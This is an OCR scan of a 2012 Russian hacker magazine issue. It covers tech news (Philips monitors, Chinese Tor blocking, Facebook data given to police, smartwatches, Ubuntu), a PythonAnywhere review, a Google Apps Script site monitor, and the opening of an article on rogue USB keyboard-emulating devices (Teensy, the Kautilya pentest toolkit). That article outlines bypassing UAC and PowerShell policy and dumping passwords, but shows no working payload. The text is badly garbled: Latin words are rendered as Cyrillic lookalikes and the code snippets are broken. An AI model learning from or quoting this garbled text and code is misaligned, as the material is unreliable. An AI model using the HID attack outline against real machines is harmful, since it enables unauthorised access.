241 Р4І.КѴ также 
можетпохвастаться 
трансформи- 
руемой подставкой, 
которая позволяет 
регулировать 
наклон, поворот, вы- 
соту и даже менять 
ориентациюэкрана 
из горизонтальной 
ввертикальную 
(функция Ріѵоі). 



дивить современного пользователя монитором сложно, но 
компании РЫІірз это удалось — во всяком случае, нас они 
удивили :]. Компания ММй Мопііогз & Оізріауз, выпускающая 
мониторы под маркой РЫІірз, недавно расширила свой ассортимент 
моделью ВгіІІіапсе 241 Р4І.РѴ. С технической точки зрения новинка 
непримечательна: обычный монитор на панели типа ТЫ диагональю 24 
дюйма разрешением 1920x1 080 точек. Интересно устройство функци- 
ей ЕгдоВепзог, которая нетолькоотслеживаетприсутствие пользова- 
теля (дисплей будет переведен в режим ожидания, если перед ним не 
окажется человека), но и анализируетто, как пользовательсидит, как 
держит шею и как дол го работает. Если ЕгдоВепзог определяет, что 
человек слишком долго находится у дисплея, на экране появляется 
значок паузы, намекающий, что глазам пора дать отдых. Аналогичным 
образом устройство информирует и о неправильной осанке. 

Вторая новинка получила имя Моба 248ХЗІ.РН5В. Этотмонитор 
интересен необычной рамкой вокругэкрана — она испускаетмягкое 
голубоесвечение, которое расслабляет глаза при длительной работе 
и тем самым снижает уста л ость глаз и повышает концентрацию вни- 
мания. Технология получила название ЫдЫРгате. В остальном РЫІірз 
Моба 248ХЗІ.РН5В — обыкновенный монитор среднего ценового 
сегмента. ЖК- панель типа ТЫ диагональю 23,6 дюйма разрешением 
1920x1 080 точек. Цена первой модели составляет 339 евро, второй — 
316 долларов. 




СООСНОВАТЕЛЬ КОМПАНИИ 600СІ.Е СЕРГЕЙ БРИН СЧИТАЕТ 



ПРОПРИЕТАРНЫЕ 
ЗАКРЫТЫЕ ПЛАТФОРМЫ 
РАСЕВООК И АРРЬЕ 
ОПАСНЫ И ЯВЛЯЮТСЯ 
НАСТОЯЩИМИ ВРАГАМИ 
СВОБОДНОГО ИНТЕРНЕТА. 



ЭЛЕКТРОННАЯ КНИГА 

на основе полимерного экрана Е-Іпк! 




ѴѴЕХСЕК.РІех ОИЕ 

ЛЕГКАЯ II 

Н о. 




Лучший выбор бесплатных книг и популярные новинки. 
Скачивайте и читайте на 'лмл/ѵѵ.цѵехіег.ги! 

щ 
ш 

МИ» 

ІМ 

ТиЬе 
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МЕ6АЫЕѴѴ5 



КАРЮ5НАКЕ ОПУБЛИКОВАЛА АНТИПИРАТСКИЙ МАНИФЕСТ, объявив своей целью полноеуничтожение пиратского контента. 



КАК КИТАЙ БОРЕТСЯ С ТОР'ОМ 

В ПОДНЕБЕСНОЙ ПОД КОЛПАКОМ 
ДАЖЕ ЛУКОВАЯ МАРШРУТИЗАЦИЯ 




звестно, что Китай пристально следит за сетевой активно- 
стью своих граждан (чегостоиттолько великий китайский 
файрвол — «Золотой щит»]. Но немногиезнают, что власти 
Поднебесной успешно перекрывают кислород даже Тог. С октября 
2011 года доступ к любому появившемуся бриджу эффективно бло- 
кируется с территории КНР в течение нескольких минут. Шведские 
исследователи Филипп Уинтер и Стефан Линдскогиз Карлстадского 
университета опубликовали целую научную работу, попытавшись 
разобраться, как КНР это делает. Выяснилось, что китайская автома- 
тическая защита работает в два этапа. Сначала на уровне глубокого 
анализа пакетов (беер раскеі іпзресііоп, БРІ) происходитобнаруже- 
ние трафика Тог. На втором этапе вступают в действие сканеры, кото- 
рыес разных ІР-адресов пытаются установить соединение с бриджем 
Тог. Если этоудается,узел блокируется национальным файрволом. 
«Золотой щит» блокирует все пакеты, в которых поле Н БАБ содержит 
символы Іогрго]есЕогд, нософициальным сайтом можноустановить 
соединение по НТТР5. После скачивания официального клиента 
с территории Китая невозможно установить соединение с офици- 
альной сетью — файрвол пропускаетисходящие сегменты 5УІ\І, но 
ответные сегменты ЗУ Ы/АСК не доходят до адресата. 



У ЕАСЕВООК ЕСТЬ ДОСЬЕ 
НА КАЖДОГО 

СОЦИАЛЬНАЯ СЕТЬ ГОТОВА ПРЕДОСТАВЛЯТЬ ПОЛИЦИИ 
ИСЧЕРПЫВАЮЩУЮ ИНФОРМАЦИЮ О ЮЗЕРАХ 

едавно в полицейском департаменте Бостона произошла 
небольшаяутечка информации. Всетьпопал пакетдоку- 
ментов, который компания РасеЬоок прислала вответназа- 
прос прокурора о пользователе по имени Филип Маркофф. Конечно 
же, эти данные строго конфиденциальны и не должны были попасть 
в открытый доступ, но, увы, попали. Оказалось, что социальная сеть 
предоставила полиции 71 страницу различныхсведений! Кпримеру, 
на страницах 11-13 приведен список всех входящих и исходящих 
личных сообщений Маркоффа, на страницах 19-52 — распечатка 
всехфотографий,закачанныхдругими пользователями, где рас- 
познано лицо Маркоффа, далее следует информация о сессиях на 
РасеЬоок (дата, время, ІР-адрес). Вспоминается случай с Максом 
Шремсом — студентом юридического факультета Венскогоунивер- 
ситета. Студент, искушенный в вопросах европейского права, отпра- 
вил в РасеЬоок грамотно составленный запрос на копию всех личных 
данных, которые на копились за три года его активности на сайте. По 
закону ЕС любая европейская компания в течение 40 дней обязана 
прислать та кой отчет по просьбе пользователя. Шремсу прислали 
СБ с рсК-файлом на несколько сотен мегабайт, содержащим более 
1200 страниц. Вся информация в файле разбита на 57 категорий 
(работа, образование, друзья, политические взгляды, хобби, фото- 
графии и та к дал ее), в том числе считающиеся «удаленными» чаты 
и фотографии — они просто хранятся в базе с пометкой «удалено». 






РОССИЙСКАЯ КОМАНДА 
ІЕЕТСНІСКЕЫ ПОБЕДИЛА 
В ФИНАЛЕ МЕЖДУНАРОД- 
НЫХ ХАКЕРСКИХ СОРЕВ- 
НОВАНИЙ С О О Е 6 АТ Е 2 0 1 2 
УІІТСЬаІІепде, прошедших 
врамкахкрупнейшейвАзии 
конференции по информаци- 
онной безопасности в Сеуле. 
Парни получили пригла- 
шение на главное событие 
в мире информационной без- 
опасности— конференцию 
ОЕРСОИ, которая пройдетв 
августе в Лас-Вегасе, США. 




КОМПАНИЯ НТС ВЫПУ- 
СТИЛА ПАТЧ ДЛЯ ДЕВЯТИ 
СМАРТФОНОВ, работающих 
на базе АпбгоісІ. Закрыта 
дырка, ставившая под угрозу 
пароли пользователей для 
ѴѴі-Рі-сетей 802.1ІХ. 



ООООЬЕ ПОДТВЕРДИЛА, ЧТО 
РАБОТАЕТ НАД ОЧКАМИ 
ДОПОЛНЕННОЙ РЕАЛЬНО- 
СТИ, о которых мы недавно 
писали. Компания даже пока- 
зала, каквыглядитпрототип 
устройства. 
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В ЮЖНОЙ КОРЕЕ АРЕСТОВАНЫ 11 СОТРУДНИКОВ КОМПАНИИБАМБиЫС. Их подозревают в краже технологии изготовления дисплеев АМОЬЕО. 



ЧАСЫ ДЛЯ 

НАСТОЯЩИХ 

ГИКОВ 

НЕОБЫЧНЫЙ ГАДЖЕТ 

ВДОПОЛНЕНИЕ 

КСМАРТФОНУ 



Интересно, что цена на эти за- 
бавныеустройства не кусается. 
Наручные часы іпРиІзе пока 
предлагаются вдвух цветовых 
решениях:серебристый метал- 
лик (100 долларов) и анодиро- 
ванный черный (150 долларов). 
БопуБтагІѴѴаІсІі обойдутся 
в 150 долларов. 





□ быкновенные наручные часы в наши дни превратились 

ваксессуар, который, побольшому счету, не несетникакой 
практической пользы — узнатьточное время можно и десят- 
ком другихспособов. Однакодизайнеры и разработчики неопускают 
руки все еще надеются вернуть часам второе дыхание. Таким образом 
на свет появляются интересные гаджеты, глядя на которые сразу 
вспоминаешь«Рір-Воу»из незабвенной РаІІоиЕ 

Компьютер, который можно носить на запястье, вообще-то весьма 
неплохая идея, нотакихустройств на рынкедосихпороченьмало.Зато 
практическиукаждогожителя мегаполиса в наши дни естьсмарт- 
фон. Кто первым догадался выпуститьчасы, работающие втандеме 
со смартфоном, неизвестно, но на рынке появилось сразу несколько 
такихустройств. Одной из первых необычные гаджеты выпустила ком- 
пания іпРиІзе ( деііприізе.сот ). назвав свои часы просто — зтагІѵѵаІсЬ. 
Они предназначены для дистанционного управления смартфонами 
ВІаскВеггу посредством ВІиеІооіЬ. Кромеаппаратов, производимых 
РІМ, часы также стыкуются с некоторыми смартфонами, работающими 
на ОС АпсІгоісІ, и с разблокированными іРГіопе. Что можно делать с по- 
мощью зтагІѵѵаІсЬ? Можно читать входящие 5М5, электронную почту, 
управлять презентациями в РоѵѵегРоіпІ и управлять іТипез. Кроме 
того, часы предоставляют информацию о входящем звонке и сих 
помощью можнодаже пинговатьсерверы :).Техническиехарактери- 



стики устройств та ковы: 1,3-дюймовый ОІ_ЕО-дисплей с разрешением 
экрана 96x1 28 пиксел ей, ВІиеІооіЬ 2.1, вибромотор, процессор 52 МГц 
АРМ7, 8 Кб ОЗУ и 32 Кб внутренней памяти для хранения приложений. 
Батареи 150 мАхватаетна четыредня работы часов. Заряжается 
устройство с помощью кабеля тісгоІІЗВ. Часы являются программи- 
руемыми, что дает вам возможность разрабатывать собственные при- 
ложения. Программный код ІпРиІзе открыт для операционных систем 
ѴѴіпсІоѵѵз, 05Х, І_іпих и АпсІгоісІ. 

Недавно похожее устройство выпустила и компания 5опу. В амери- 
канских магазинах появились наручные часы ЗопуЗтагіѴѴаІсЬ, тоже 
являющиеся своеобразным дополнением и расширением для АпбгоісІ- 
смартфона (или планшета). Часы работаютна платформе АпсІгоісІ 2.1 
и общаются с головным устройством по ВІиеІооіЬ 3.0 в реальном вре- 
мени. Часы сообщаюто приходеновой почты, 5М5, входящихвызовах, 
погоде, сообщениях в твиттере и та к дал ее. В базовой комплектации 
ЗопуЗтагіѴѴаІсЬ оснащаются следующими приложениями: 5М5/ММ5, 
корпоративная почта (для смартфоновЗопу и ЗопуЕгісззоп), ОтаіІ (для 
всехсмартфонов) календарь, РасеЬоокДѵѵіиег, музыкальный плеер, 
обработка звонков (ответить, отклонить, отправить предустанов- 
ленное 5М5 и так дал ее), отображение заряда батареи на смартфоне, 
функция «найти телефон» и погода. Кроме того, можно устанавливать 
дополнительные приложения из каталога СоодІеРІау. 




ПРИЛЕЖНАЯ ЯЩЕРКА 

ивимтиі2.04іт5«ррЕСі5ЕРАЫбоиы» 

асерверахСапопісаІ появиласьновая версия дистрибутива 
ІІЬипІи. Релиз назван вчестьпанголина — древнеговида млеко- 
питающих, который обитает в Африке и Юго-Восточной Азии. Тело 
этого ящера покрыто крупной чешуей, защищающей его отхищников. По 
мнению Марка Шаттлворта, имя Рапдоііп отлично подходитдля І_Т5-релиза, 
поскольку символизирует долговечность, надежность и защищенность. 
Каки предыдущие ПБ-выпуски, данный релиз несодержиткардинальных 
изменений: он л ишь вобрал в себя те новшества и технологии, которые 
были накопленыза последние несколько лет. В интерфейсііпііуинтегри- 
рован интеллектуальный механизм поиска изапускатребуемыхпунктов 
меню НІЮ (НеасІ-ІІр Оізріау). Круто, что теперь можно не бегать по пунктам 
меню мышкой, а просто набирать команды в НІЮ. В серверной редакции 
предложен полный комплекс средств для развертывания иуправления как 
большим числом физических серверов, так и облачны ми системами. 
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Сессия с Му5СІ!_, открытая на РуІІіопАпуѵѵІіеге. Как видно из статистики, демон крутится на серверах Атагоп 



Хочу поделиться с тобой интересным сер- 
висом, на который я наткнулся совершенно 
случайно. Мой друг попросил разработать для 
него простейший граббер, который смог бы 
собрать нужные данные с некоторых сайтов. 
Задачка плевая: все решение заняло не более 
200 строчек кода на РуЛіоп. Оставалось найти, 
где захостить скрипт, чтобы он выполнялся 
по расписанию, собирая данные в БД, — и 
сделать это бесплатно. Добрые люди подкину- 
ли ссылочку на новый проект РуЛпопАпуѵѵЬеге 
( ѵѵѵѵѵѵ.руіЬопапѵѵѵЬеге.сот ), который превзо- 
шел все мои ожидания. Что он собой представ- 
ляет? По сути, это платформа для разработки 
и развертывания веб-приложений на РуЛіоп, 
которой при небольшой нагрузке можно поль- 
зоваться бесплатно. Попробую описать, что у 
РуЛпопАпуѵѵЬеге внутри. 

После регистрации ты попадаешь в свою 
панель управления (ОавЬЬоагсІ), на которой 
пять вкладок: «Сопвоіез», «Рііез», «ѴѴеЬ», 
«ЗсЬесМе», «Му5СІІ_». Вкладка «Сопзоіез» по- 
зволяет стартовать новую консоль на сервере: 
это может быть интерпретатор РуЛіоп (помимо 
стандартного пайтона, поддерживаются еще 
ІРуЛіоп и РуРу), сессия с Му5(ЗІ_, а также ВазЬ. 
То есть сервис предлагает тебе свои облачные 
ресурсы, чтобы ты одним кликом мог, к приме- 
ру, открыть интерпретатор и выполнить любой 
сценарий. Сессия не теряется при закрытии 
браузера — к ней всегда можно вернуться. 
Процесс вообще убивается только по нашей 
же команде. Что еще более прикольно, можно 
расшарить сессию любому пользователю и 
работать в ней совместно. Доступ к командной 
строке (ВазЫ позволяет делать очень многое, 
в том числе использовать системы контроля 
версий діі, тегсигіаі, зиЬѵегзіоп или, к при- 
меру, устанавливать дополнительные модули 
РуіЬоп через удобные инструменты еазу_іпзІаІІ 
или рір. 

Секция «Рііез», что очевидно, позволяет 
работать с файлами. Бесплатно выделяется 
500 Мб, но эту квоту легко расширить, если 
подвязать свой аккаунт в йгорЬох. Более того, 
это еще и довольно удобный способ загружать 
нужные файлы проекта. Просто сохраняешь 
все, что нужно, в йгорЬох — и оно подгружа- 
ется в твой акк на РуіЬопАпуѵѵЬеге. В проект 



встроен редактор кода, поэтому сорцы можно 
удобно редактировать прямо из браузера, в 
том числе с мобильного устройства. Кнопка 
«5аѵе & Рип» позволяет быстро стартовать 
сценарий. Приятно, что для РуіЬоп предо- 
ставлено огромное количество «батареек» 

— модулей, готовых к использованию, в том 
числе ІМитРу (научные вычисления), русгуріо 
(криптография), ВеаиШиІБоіір (парсинг сайтов) 
и другие. 

Впрочем, запускать скрипты в консоли — 
это не самый полезный функционал. Гораздо 
более важно, что проект позволяет хостить 
веб-проекты на базе РуіЬоп. На вкладке «ѴѴеЬ» 
можно быстро создать шаблон приложения 
на базе популярных фреймворков й ) а п д о и 
Ѵ\/еЬ2ру. Впрочем, ты можешь подключить что 
угодно, если поправишь конфи г ѴѴ56 1 (стан- 
дарта взаимодействия РуіЬоп-приложения 
и веб-сервера). По умолчанию по адресу 
имя_аккаунта.руіЬопапу\л/Ьеге.сот работает 
простенький сайт-заглушка. В качестве серве- 
ра используется АрасЬе, а его логи (Ассезз Іод 
и Еггог Іод) можно посмотреть через веб-морду 
или через консоль (/ѵаг/Іод/арасГіе2/). 



Мне нужно было наладить запуск скрипта в 
определенное время, и для этого не пришлось 
городить никакой огород, потому что на- 
стройка планировщика вынесена в отдельную 
вкладку «БсЬесІиІе». Бесплатный аккаунт 
позволяет запускать скрипт по расписанию 
лишь раз в сутки, но меня это вполне устроило 
(скрипт должен был именно раз в сутки пар- 
сить два десятка сайтов). Просто указываем 
время и путь к сценарию — и все готово. 

Мой простой скриптик завелся с полпинка. 
Ночью он запускался по графику, добавлял 
собранную информацию в Му5(ЗІ_ и позволял 
делать выборку с помощью простого веб- 
интерфейса, написанного на коленке. Нагруз- 
ка у него совсем небольшая, поэтому я вполне 
обошелся бесплатным аккаунтом и при этом 
насладился довольно любопытным сервисом. 
Такие инструменты всегда приятно открыть 
для себя. Кстати, в основе сервиса лежат мощ- 
ности облачной платформы Атагоп (она так 
стремительно развивается, что мы начинаем 
упоминать ее уже в каждом номере). Благода- 
ря этому на РуіЬопАпуѵѵЬеге можно размещать 
и довольно серьезные веб-приложения. X 
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" РгооНоНСопсерІ: 

Щ РЕАЛИЗОВАТЬ МОНИТОРИНГ САЙТА 

Ѵ ЧЕРЕЗ СКРИПТЫ В 0006І.Е 00С5 



КАК МОНИТОРИТЬ САЙТ? 

Если у тебя есть веб-сайт, то ты наверняка задумывался о возмож- 
ности мониторинга его состояния. Например, наш сайт недавно 
лежал несколько дней, потому что регистратор РІІ-СепІег прекратил 
делегирование домена хакер.ги из-за каких-то бюрократических 
заморочек. Повод был: наши админы действительно протупили и во- 
время не предоставили запрошенные документы. Но останавливать 
делегирование и два дня проверять какие-то там бумажки — это как 
называется? Впрочем, это тема для отдельного разговора. Если вер- 
нуться к мониторингу, то в Сети сейчас доступно немало сервисов, 
предлагающих проверять доступность сайта с некоторой произво- 
дительностью: зііе24х7.сот, ріпдсіот.сот и многие другие. Однако 
бесплатные тарифы ограничивают пользователя в периодичности 
опроса сайта (в лучшем случае интервал составляет 15 минут), а так- 
же в количестве ресурсов, которые можно указать для опроса. Про- 
стейший мониторинг есть, к примеру, и в сервисе аналитики Яндекс. 
Метрика, но многие не раз замечали, что отчеты о падении сайта 
приходят с солидной задержкой. Забавное и в то же время изящное 
решение проблемы мониторинга предложил Амит Агарвал ( Ьіі.іѵ/ 
НУОсЦи) — реализовать мониторинг через боодіе йосз. Как?! Мало 
кто знает, но офисные инструменты от боодіе предлагают не только 
редактировать документы и таблицы, но и надстраивать над ними 
довольно серьезные сценарии с помощью скриптового механизма 
боодіе Аррз бсгіріз, позволяющего делать немало прикольных штук. 

КАК ЭТИМ ПОЛЬЗОВАТЬСЯ? 

Чтобы сразу стало ясно, о чем я говорю, опишу, как буквально за 
минуту настроить работающий мониторинг для любого сайта. 

1. Входим в свой аккаунт боодіе и переходим по ссылке [ ЬіЕІѵ/ 
ЛКЗС2 І. чтобы создать копию документа боодіе Оосз. 

2 . Далее в ячейке ЕЗ указываем I) ПІ_ сайта для мониторинга, а 
в Е5 — е-таіі, на который будут высылаться уведомления в 
случае проблем. 

3. В документе уже встроены все необходимые скрипты, однако 
нам дополнительно необходимо обозначить выполнение 




функции «Опросить сайт» с нужным интервалом. Это реали- 
зуется через систему триггеров: переходи в меню «Инстру- 
менты -> Редактор скриптов -> Ресурсы -> Триггеры текущего 
проекта». Здесь создаем триггер с тип ом запуска по времени 
(Тіте-Огіѵеп) и выставляем нужный интервал (например, 
каждую минуту), указывая в качестве функции для запуска 
ізМу5і1:е0оѵѵп. 

4. Сохраняй триггер — боодіе выдаст грозное предупреждение и 
попросит подтвердить авторизацию. Просто соглашайся. 

С этого момента скрипт начнет мониторинг. Если возникнут 
проблемы, то ты сразу увидишь их в логе с указанием времени 
обнаружения проблемы и типа ошибки (например, проблемы с 0145, 
ага). Уведомление также будет отправляться на е-таіі. Если сайт 
поднимется (ура-ура !), то ты также сразу об этом узнаешь. 

КАК ЭТО РАБОТАЕТ? 

Таким образом, мы получаем бесплатный облачный сервис для мо- 
ниторинга произвольного количества сайтов, который опрашивает 
ресурсы с минимальным интервалом. Но что еще интереснее — его 
можно как угодно кастомизировать, ведь в основе лежит очень 
простой скрипт, с помощью которого ты можешь менять логику ра- 
боты мониторинга. Ничего не стоит, к примеру, завести аккаунт на 
каком-нибудь дешевом 5М5-шлюзе и, используя его АРІ, отправ- 
лять уведомления о проблемах еще и по 5М5. Самая важная часть 
скрипта умещается в два десятка строк кода: 

ТипсТіоп ізМѵЗіІіе Роы п ( ) { 

ѵаг игі = БргеасІзІіееІіАрр.^еІіАсІііѵеБІіееІіО . 

§е1:Кап§е("ЕЗ") . %е1:Ѵа1иеО ; 

*гу { 

гезропзе ІІг1Ре1:сІіАрр.Те1:сІ'і(иг1^ 

} _саісІі(еггог) 

{ 

іпзегШаІіаСеггог . -1. "ЫеЬзіІіе сіошп"); 
геііигп; 

} 

ѵаг сосіе = гезропзе. §е1:Ке5роп5еСосІе( ) ; 

і-р (сосіе == 200) іпзег-ШаТаС'ІІр" , сосіе, "ІлІеЬзіТе ир"); 

еізе іпзег1=Ра1:а (гезропзе. §е1=Соп1=еп1:П [0] . сосіе, 

"ІлІеЬзі-бе сіоып"); 

Думаю, тут не надо даже ничего комментировать. Вообще 
боодіе Аррз бсгірі произвел самое приятное впечатление. Скажу 
больше: странно, что я никогда не использовал его ранее! Ктому 
же на официальном сайте технологии помимо документации есть 
немало полезных и готовых к использованию сценариев. Напри- 
мер, спам-рассылка по базе е-таіі-контактов :). ПЕ 
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ЗЛОВРЕДНЫЕ ІІ5В-УСТР0ЙСТВА ЗА 24 ДОЛЛАРА 

У современных ОС есть интересная особенность — они полностью доверяют устройствам вроде 
клавиатуры или мыши. Соответственно, если собрать девайс, который будет эмулировать нужный 
ввод, и подключить его к компьютеру, то можно творить все что угодно. Этим и пользуются 
злоумышленники. 
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Девайсы-вирусы 



МАЛЕНЬКИЙ ПРИМЕР 



Начну с небольшой демонстрации. Представь: специалист по 
безопасности проводит внутренний пентест в некоторой компа- 
нии и видит, что один из сотрудников часто оставляет станцию 
незалоченной. Очевидный путь — подойти и выполнить не- 
сколько «злобных» команд, пока этого никто не видит. Однако 
есть серьезный риск быть пойманным за чужим рабочим местом 
да еще набирающим что-то непонятное в черном окне консо- 
ли :). А если бы у исследователя было устройство, которое при 
подключении само бы набирало заранее запрограммированные 
команды? Подойти и незаметно вставить такой девайс — уже 
не слишком большая проблема. Или другой пример. Пусть это 
будет уже злоумышленник, у которого нет физического доступа 
к компьютерам. Если замаскировать девайс под видом мышки, 
флешки или 33-модема, то есть шанс, что его без лишней по- 
мощи вставит кто-то из самих же сотрудников. Известны случаи, 
когда такие «протрояненные» девайсы отправлялись просто по 
почте в качестве сувенирки. Процент пользователей, которые, 
не подозревая о подвохе, подключают устройство к компьютеру, 
достаточно высок. При этом ни система, ни, к примеру, антивирус 
не замечают подвоха — для них это обычная клавиатура. Почему 
так происходит? 



НЮ-УСТРОЙСТВА 



Для начала надо разобраться с понятием Нштап Іпіег^асе йеѵісе, 
или НЮ. В Википедии говорится, что НЮ — тип компьютерного 
устройства, которое взаимодействует напрямую с человеком, 
наиболее часто принимает входные данные от человека и предо- 
ставляет ему выходные данные. Самые распространенные типы 
НЮ-устройств — это клавиатуры, мыши и джойстики. С точки 
зрения компьютерной системы НЮ-устройства являются полно- 
стью доверенными и в основном рассматриваются как простой 
интерфейс между пользователем и машиной. Когда ты встав- 
ляешь в компьютер новую клавиатуру и мышь, никто у тебя не 
спрашивает разрешения на их установку, а драйверы чаще всего 
устанавливаются автоматически. Такое безграничное доверие 
может выйти боком для пользователя и давно замечено специ- 
алистами по информационной безопасности. Еще в 2010 году на 
хакерской конференции йЕРСОІЧ небезызвестные I гопдеек и йаѵе 
РеІ_1к подробно рассказывали об использовании НЮ-устройств 
для проверки безопасности систем. С тех пор в плане защиты не 
изменилось ровным счетом ничего. И собрать девайс, который 
под видом клавиатуры будет выполнять запрограммированные 
действия, ничто не мешает и сейчас, в чем я убедился в рамках 
моего исследования. 



ИЗВЕСТНЫ СЛУЧАИ, КОГДА 
ТАКИЕ «ПРОТРОЯНЕННЫЕ» 
ДЕВАЙСЫ ОТПРАВЛЯЛИСЬ 
ПРОСТО ПО ПОЧТЕ В КАЧЕСТВЕ 
СУВЕНИРКИ 



ПЛАТА ТЕЕЫ5Ѵ 



За основу такого ІІ5В-девайса была выбрана плата Теепзу++ 2.0. 
Это программируемый микроконтроллер, который изначально идет 
вместе с полноценным ІІ5В-портом. Среди примеров использо- 
вания Теепзу, в огромном количестве собранных на официальном 
сайте, — І_ЕО-футболка, которая с помощью диодов выводит раз- 
личные изображения, станок для рисования маркером, наносящим 
нужный рисунок на любую ровную поверхность, считыватель РРЮ- 
карточек, детектор движения и еще десятки полезного и не очень 
«самопала». Ты наверняка слышал о платах Агсішпо и ее аналогах, 
так вот Теепзу — очень похожий проект. Но что важно для моей за- 
дачи: на Теепзу чрезвычайно просто реализовать НЮ-устройство, 
которое будет определяться системой как клавиатура или, к при- 
меру, мышь. Поскольку плата изначально снабжена 11513-портом, то 
мне даже не пришлось брать в руки паяльник и выполнять какие- 
либо хардкорные вмешательства. Все, что было нужно, — написать 
правильную программу. Замечу, что у платы есть несколько версий, 
но я выбрал самую навороченную и дорогую — Теепзу++ 2.0. Ее 
можно заказать на официальном сайте проекта р]гс.сот всего за 
24 доллара. 



НШ-0 ѴѴОРІ.Р ДЛЯ ЖЕЛЕЗКИ 



Теепзу, как и платы Агсішпо, использует похожий процессор АітеІ 
АѴР, поэтому можно взять ту же среду разработки — Агсішпо 
Оеѵеіортепі Епѵігоптепі [ агсіиіпо.сс ). ее также называют АйЕ. 
Последняя бесплатно доступна для всех популярных ОС (ѴѴіпсІоѵѵз, 
Ыпих, Мае 05 X] и, помимо редактирования кода, позволяет за- 
лить программу в микроконтроллер. Чтобы полноценно исполь- 
зовать ее для работы с Теепзу, необходимо также установить 
дополнительный аддон Теепзусішпо [ р]гс.сотЛеепзуЛеепзус1иіпо. 
Мті). Надстройка, в частности, сразу предоставляет возможность 



ОГРАНИЧЕНИЯ ТЕЕ№Ѵ 



Есть один нюанс, который сильно усложняет Тееп5у жизнь. 
Поскольку мы используем эмуляцию НЮ-устройства, то мы 
можем говорить с системой, но не можем ее услышать. Это 
основное ограничение при написании пэйлоадов для Теепзу, 
которое делает пэйлоады менее чувствительными к состоянию 
системы. Разработчику боевых нагрузок придется заранее 
определить все возможные ситуации и реакцию системы, 
потому что во время выполнения прочитать ответ системы будет 
невозможно. Единственная вещь, которую Теепзу может считать, 
когда используется в качестве клавиатуры, — это состояние 
кнопок САР5, ІЧІІМ и 5СР0И. Еще одним ограничением является 
маленький размер памяти устройства, но с этим можно жить, 
особенно если подключить к Теепзу дополнительный носитель 
данных, например 50-карту. 
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Среда разработки Агсіиіпо Оеѵеіортепі Епѵігоптепі с установленным плагином для 
совместимости с Теепзу 
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ѴгІЪсеп Ву: ЭДікІѵіІ № 5атсасАэ1юк м Кітіхаі 

Тыіьъег : Ёпікіііі этіьъ 

Б іщз й ЕеейЬаск: лік1іі1_іл^іг^рѵѲуаНо&.со , іп 
Сойе : }ѵьър;//ео^е . дао^іе . еом/р/каиіііуа/ 

Еіод: ]п:^р://іаьоіарепетгАг іопсезгег .Ыодірос .саго/ 



Каиъііуа із а Еоаікіъ ъе еазе изаде оё Теепзу іи рмпаде. 
Ѵои пеесі Теепзу++ ісот рдгс.созпп со изе скьз гооікіс. 



Сіюозе ъагдес 05 Ёгогн ъЬ,е шетаи Іэеіоч: 



2. Рауіоагіэ Ёог НІШ20ѴЗ 

2. Рау іоасіэ Ёог іЛпнх 



О . Е к і ё. Ка аИ і і у ш 

Каш: іЛуа> | 



Автор этой статьи 
живет в Индии, 
атулкитКаиІіІуа 
назван в честь 

ИНДИЙСКОГО 

стратега, 
экономиста 
и политолога 
Чанакья (Каутилья 
— один из его 
псевдонимов). 



ІІМРОІ 



Насколько мне 
известно, до 
создания Каиіііуа 
пэйлоады для Теепзу 
были реализованы 
только в инструменте 
5ЕТ (БосіаІ Епдіпеег 
Тооікіі, ѵѵѵѵѵѵ.зеста- 



піас.сот ). и они, вне 
всякого сомнения, 
оченьхороши! Новее 
же БЕТ сфокусирован 
несколько на других 
задачах. 



Управление тулкитом Каиіііуа осуществляется через консольное меню 



перевести Теепзу в режим эмуляции клавиатуры: это делает- 
ся в АйЕ через меню «Тооіз -> Воагсіз -> 115В КеуЬоагсІ». Если 
вставить девайс в компьютер, то он сразу определится как клава. 
Однако происходить ничего не будет — пока ничего не запрограм- 
мировано. 

Что представляет собой программа или, как ее называют 
в здешней терминологии, скетч для Теепзу? Разработка осу- 
ществляется с помощью С-подобного синтаксиса. Программисту 
доступны переменные, методы, условные операторы, указатели 
— короче говоря, все, что нужно для счастья. Любой скетч должен 



НШ-УСТРОЙСТВА ЯВЛЯЮТСЯ 
ПОЛНОСТЬЮ ДОВЕРЕННЫМИ 
И РАССМАТРИВАЮТСЯ КАК 
ПРОСТОЙ ИНТЕРФЕЙС МЕЖДУ 
ЮЗЕРОМ И КОМПЬЮТЕРОМ 



содержать функции зеІирП и Іоор(): первая вызывается один раз 
во время запуска, а вторая в цикле выполняет написанный внутри 
нее код. Функции могут быть даже пустыми, однако присутствовать 
должны — иначе компиляция будет завершаться неудачей. При- 
веду пример простейшего кода: 

іп~Е соипТ = 0; 
ѵоіеі з еТирП X- } 
ѵоіеі І оорО { 

КеуЬо агсІ. ргіітЕ("Не11о іліогісі ") ; 

сіе1ау(5Ѳ®Ѳ); 

Ь_ 

Как видишь, для эмуляции ввода используется уже готовая 
функция КеуЬоагсІ. ргіпі(). Причем ввод будет повторяться, потому что 
вызов осуществляется из функции ІоорО. Задержка, реализованная 
с помощью сІеІауО, нужна для того, чтобы повторение ввода не про- 
исходило слишком быстро. В документации подробнейшим образом 
описываются более сложные случаи эмуляции и клавиатуры, и мыш- 
ки, и джойстика — я же на этом описание программирования Теепзу 
закончу. В ходе своего исследования я уже создал все необходимые 
скетчи, которые могут понадобиться пентестеру, и оформил их в виде 
готового набора инструментов КаиЫуа ( сосІе.доодІе.сот/р/каиЫуа ). 
который доступен с открытыми исходниками всем желающим. 
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Создаем скетч для дампа пользовательских паролей 



ТУЛКИТ КАІІТНУА 



В ходе лекций о Теепзу я заметил, что очень часто у пентестеров ба- 
нально не хватает времени для программирования микроконтролле- 
ра под свои нужды. В результате они просто отказываются от этого 
инструмента. Я решил максимально упростить задачу и написал 
на ПиЬу скрипт, спрашивающий некоторые параметры и на выходе 
выдающий готовый скетч, который можно загрузить в Теепзу. Благо- 
даря этому снабдить микроконтроллер боевой нагрузкой можно 
вообще без знания о том, как пишутся программы для микроконтрол- 
лера. Чтобы лучше понимать, что зашито внутри Каиіііуа, предлагаю 
рассмотреть, как бы выглядел пентест ѴѴіпсІоѵѵз 7 машины с помощью 
НЮ-устройства, если бы необходимо было начинать с нуля. Скорее 
всего, это были бы следующие этапы: 

1. Распознать операционную систему с точки зрения ІІ5В-буфера. 

2 . Выяснить поддерживаемые команды и научиться с их помощью 
реализовывать нужные нам действия в системе с помощью 
РоѵѵегБЬеІІ- и/или ѴВ5-скриптов. 

3. Определить встроенные механизмы безопасности (такие как 
ІІАС и политиказапуска РоѵѵегБЬеІІ-скриптов), которыемогут 
проверять привилегированные команды, и затем найти способ их 
обходить. 

4 . Узнать время, затрачиваемое ОС на выполнение различных 
команд. 

5 . Записать команды и скрипты на плату Теепзу. 



